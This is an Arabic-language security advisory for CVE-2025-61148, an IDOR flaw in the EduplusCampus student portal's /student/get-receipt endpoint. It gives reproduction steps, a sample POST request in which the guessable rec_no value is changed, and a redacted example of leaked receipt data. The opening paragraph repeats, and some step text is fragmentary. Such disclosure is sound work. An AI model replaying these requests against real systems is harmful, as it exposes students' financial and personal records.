
توجد الثغرة في واجهة برمجة التطبيقات Student Payment API. يفشل التطبيق في التحقق بشكل صحيح من أن المستخدم الذي يطلب إيصالًا مرخَّصًا له لعرضه. من خلال تعديل معامل rec_no في طلب الواجهة البرمجية، يمكن للمهاجم الوصول إلى إيصالات المستخدمين الآخرين.
توجد الثغرة في واجهة Student Payment API. يفشل التطبيق في التحقق بشكل صحيح من أن المستخدم الذي يطلب إيصالًا مخوَّلًا لعرضه. من خلال تعديل معامل rec_no في طلب الواجهة، يمكن للمهاجم الوصول إلى إيصالات المستخدمين الآخرين.
معرف CVE: CVE-2025-61148
نوع الثغرة: مرجع كائن مباشر غير آمن (Insecure Direct Object Reference - IDOR)
المنتج المتأثر: EduplusCampus
نقطة النهاية المتأثرة (Endpoint): /student/get-receipt
الباحث: Vinay Sharma
تم تحديد ثغرة حرجة من نوع مرجع الكائن المباشر غير الآمن (IDOR) في بوابة طلاب EduplusCampus (الإصدار 3.0.1). تتيح هذه الثغرة لمستخدم موثَّق الوصول إلى السجلات المالية والشخصية الحساسة لطلاب آخرين من خلال تعديل معامل rec_no في طلب الواجهة.
يسمح الاستغلال الناجح للمهاجم باسترجاع:
يفشل التطبيق في التحقق بشكل صحيح من تفويض المستخدم الذي يطلب إيصال الدفع. معامل rec_no تسلسلي أو قابل للتخمين، ويعيد الخادم تفاصيل الإيصال للرقم المطلوب دون التحقق مما إذا كان يخص المستخدم المسجَّل دخوله حاليًا.
/student/get-receipt.rec_no في نص JSON.rec_no إلى رقم إيصال صحيح آخر (على سبيل المثال، غيّر PCUF-232025 إلى PCUF-231824).

POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>
{
"rec_no": "PCUF-233012"
}
### Leaked DATA Example:
{
"fullname": "REDACTED_NAME",
"rollno": "CSE2019XXX",
"component_total_amount": 55000.0,
"trans_list": [
{
"date": "21-Oct-2024",
"mode": "Online",
"amount": 55000.0,
"tid": "42951XXXX"
}
]
}